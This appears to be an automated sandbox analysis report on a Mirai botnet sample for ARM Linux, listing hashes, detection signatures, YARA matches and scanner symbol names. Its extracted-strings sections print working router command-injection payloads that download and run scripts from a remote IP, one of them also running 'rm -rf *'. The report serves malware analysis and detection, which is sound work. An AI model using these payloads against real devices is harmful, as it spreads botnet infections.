Linux Analysis Report
vmDskLsKEA

Overview

General Information

Sample Name: vmDskLsKEA
Analysis ID: 679611
MD5: 342a4469d06b1438b3833d1ab38acc33
SHA1: b5fbf4cd5a4809fd06e92fa77bfdd92a408770d6
SHA256: 82c8487ec2c35eb44d47a6068c65360aa23dd17324d4954b04985856c060aab2
Tags: 32armelfmirai
Infos:

Detection

Mirai
Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Contains symbols with names commonly found in malware
Yara signature match
Sample contains strings that are potentially command strings
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample and/or dropped files contains symbols with suspicious names
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: vmDskLsKEA Avira: detected
Multi AV Scanner detection for submitted file
Source: vmDskLsKEA Virustotal: Detection: 59% Perma Link
Sample listens on a socket
Source: /tmp/vmDskLsKEA (PID: 6225) Socket: 127.0.0.1::44455 Jump to behavior
Source: vmDskLsKEA String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: vmDskLsKEA String found in binary or memory: http://purenetworks.com/HNAP1/
Source: vmDskLsKEA String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: vmDskLsKEA String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary
barindex
Contains symbols with names commonly found in malware
Source: ELF static info symbol of initial sample Name: attack.c
Source: ELF static info symbol of initial sample Name: attack_app_http
Source: ELF static info symbol of initial sample Name: attack_get_opt_int
Source: ELF static info symbol of initial sample Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample Name: attack_get_opt_str
Source: ELF static info symbol of initial sample Name: attack_init
Source: ELF static info symbol of initial sample Name: attack_method.c
Source: ELF static info symbol of initial sample Name: attack_method_std
Source: ELF static info symbol of initial sample Name: attack_method_tcp
Source: ELF static info symbol of initial sample Name: attack_method_tcpfrag
Yara signature match
Source: vmDskLsKEA, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: vmDskLsKEA, type: SAMPLE Matched rule: MAL_ARM_LNX_Mirai_Mar13_2022 date = 2022-03-16, hash1 = 0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68, author = Mehmet Ali Kerimoglu a.k.a. CYB3RMX, description = Detects new ARM Mirai variant
Source: 6225.1.00007f99dc042000.00007f99dc047000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6228.1.00007f99dc042000.00007f99dc047000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6228.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6225.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Sample and/or dropped files contains symbols with suspicious names
Source: vmDskLsKEA ELF static info symbol of initial sample: __gnu_unwind_execute
Source: vmDskLsKEA ELF static info symbol of initial sample: asus_scanner_init
Source: vmDskLsKEA ELF static info symbol of initial sample: asus_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: asus_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: comtrend_scanner
Source: vmDskLsKEA ELF static info symbol of initial sample: comtrend_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: comtrend_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: dlink_scanner.c
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_fake_time
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_rsck
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_scanner_init
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_setup_connection
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon443_scanner
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon443_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon443_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon80_scanner
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon80_scanner.c
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon80_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon80_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: hnap_scanner.c
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_fake_time
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_rsck
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_scanner_init
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_setup_connection
Source: vmDskLsKEA ELF static info symbol of initial sample: huawei_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: huawei_scanner_rawpkt
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal68.troj.lin@0/0@0/0
Reads system information from the proc file system
Source: /tmp/vmDskLsKEA (PID: 6229) Reads from proc file: /proc/stat Jump to behavior
Enumerates processes within the "proc" file system
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6236/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6235/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2033/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2275/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6191/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6190/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1612/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1699/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1698/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2028/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/3236/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2025/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2146/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/910/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/912/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6229/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/517/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/759/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/918/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6240/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6243/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6244/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6247/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6246/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2285/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2281/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1623/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/761/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1622/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/884/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1983/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2038/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2156/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/800/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6238/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/801/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1629/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1627/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1900/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6252/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6253/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6258/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6257/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/3021/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/491/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2294/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2050/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1877/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/772/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1633/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1632/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/774/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/654/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/896/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1872/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2048/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/655/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2289/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/656/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/777/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/657/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/4466/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/658/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/4467/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6248/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/4468/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/4469/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/4502/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/419/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/936/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1639/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1638/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2208/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2180/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1809/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1494/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1890/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2063/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2062/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6261/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6260/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1888/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1886/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/420/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1489/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/785/exe Jump to behavior
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1642/exe Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/vmDskLsKEA (PID: 6225) Queries kernel information via 'uname': Jump to behavior
Source: vmDskLsKEA, 6225.1.00005564dbe5e000.00005564dbfb0000.rw-.sdmp, vmDskLsKEA, 6228.1.00005564dbe5e000.00005564dbf8c000.rw-.sdmp Binary or memory string: dU!/etc/qemu-binfmt/arm
Source: vmDskLsKEA, 6225.1.00007ffd2da8a000.00007ffd2daab000.rw-.sdmp, vmDskLsKEA, 6228.1.00007ffd2da8a000.00007ffd2daab000.rw-.sdmp Binary or memory string: m9x86_64/usr/bin/qemu-arm/tmp/vmDskLsKEASUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/vmDskLsKEA
Source: vmDskLsKEA, 6225.1.00005564dbe5e000.00005564dbfb0000.rw-.sdmp, vmDskLsKEA, 6228.1.00005564dbe5e000.00005564dbf8c000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: vmDskLsKEA, 6225.1.00007ffd2da8a000.00007ffd2daab000.rw-.sdmp, vmDskLsKEA, 6228.1.00007ffd2da8a000.00007ffd2daab000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: vmDskLsKEA, type: SAMPLE
Source: Yara match File source: 6228.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6225.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: vmDskLsKEA, type: SAMPLE
Source: Yara match File source: 6228.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6225.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY

No Screenshots

No contacted IP infos